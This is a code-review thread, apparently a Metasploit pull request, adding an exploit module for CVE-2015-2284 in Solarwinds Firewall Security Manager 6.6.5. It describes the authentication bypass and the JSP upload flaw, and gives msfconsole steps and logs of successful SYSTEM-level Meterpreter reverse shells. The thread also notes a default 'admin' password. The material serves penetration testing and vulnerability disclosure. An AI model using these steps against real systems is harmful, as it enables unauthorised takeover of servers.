Add CVE-2015-2284: Solarwinds Firewall Security Manager 6.6.5 Session Handling Vulnerability

[wchen-r7]

This module exploits multiple problems against Solarwinds Firewall Security Manager 6.6.5. The first one is an authentication bypass due to the improper use of session.putValue, allowing the attacker to set the "username" attribute. The second problem is that the fileUpload action will only check the "username" attribute before authorizing the upload resource, which can be abused to upload a malicious JSP payload, and this will result in arbitrary code execution under the context of SYSTEM.

To prepare for testing

• A server-class Windows host, such as: Windows Server 2003 or later (including SP2), Server 2003 R2 or later (including SP2), Server 2008 or later (including SP2), Server 2008 R2 or later (including SP1), Server 2012.
• Download Solarwinds Firewall Security Manager 6.6.5 and install it. The official download link is here: http://www.solarwinds.com/firewall-security-manager.aspx

The specific setup I have is this: Windows Server 2008 Enterprise SP2, with Solarwinds FSM 6.6.5 (build 6.6.5-115-20141020, express install). If you no longer have the vulnerable version, you can try my box instead in person.

Testing

• First, open a browser, and then go to: http://[IP]:48080/ to make sure you can actually connect to FSM's web interface. If port 48080 isn't there, then try 8080
• Start msfconsole
• Do: use exploit/windows/http/solarwinds_fsm_userlogin
• Do: set rhost [IP]
• Do: run
• You should get a session like the following demo:

$ msfconsole
msf > use exploit/windows/http/solarwinds_fsm_userlogin 
msf exploit(solarwinds_fsm_userlogin) > set rhost 192.168.1.169
rhost => 192.168.1.169
msf exploit(solarwinds_fsm_userlogin) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] 192.168.1.169:48080 - Auth bypass: Putting session value: username=admin
[*] 192.168.1.169:48080 - Your SID is: JSESSIONID=1ehx5ezth8ktxu33axxaj8b40
[*] 192.168.1.169:48080 - Uploading file: YUbnH.jsp (73802 bytes)
[*] 192.168.1.169:48080 - Payload being treated as XLS, indicates a successful upload.
[*] 192.168.1.169:48080 - Attempting to execute the payload.
[*] Sending stage (785920 bytes) to 192.168.1.169
[+] Deleted ../plugins/com.lisletech.athena.http.servlets_1.2/jsp/YUbnH.jsp

meterpreter >

Note: The default password to login as admin is "admin", in case you're curious. The exploit does not need to use this though.

[void-in]

@wchen-r7 The default port is 48480 or 48080? Here you have mentioned the first but in the module description it is the second. I guess a typo but not sure which one.

[wchen-r7]

Ah, should be 48080. I made a typo. Thanks!

[jvazquez-r7]

Tested ok:

msf > use exploit/windows/http/solarwinds_fsm_userlogin
msf exploit(solarwinds_fsm_userlogin) > set rhost 172.16.158.131
rhost => 172.16.158.131
msf exploit(solarwinds_fsm_userlogin) > run

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.131:48080 - Auth bypass: Putting session value: username=admin
[*] 172.16.158.131:48080 - Your SID is: JSESSIONID=bo74uo5gnkjgyeypj47wxznh
[*] 172.16.158.131:48080 - Uploading file: rIfVF.jsp (73802 bytes)
[*] 172.16.158.131:48080 - Payload being treated as XLS, indicates a successful upload.
[*] 172.16.158.131:48080 - Attempting to execute the payload.
[*] Sending stage (785920 bytes) to 172.16.158.131
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.131:1264) at 2015-04-03 13:44:21 -0500
[+] Deleted ../plugins/com.lisletech.athena.http.servlets_1.2/jsp/rIfVF.jsp

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

landing!

[jvazquez-r7]

Ready! Just did minor cleanup here: 7c9b19c

Thanks!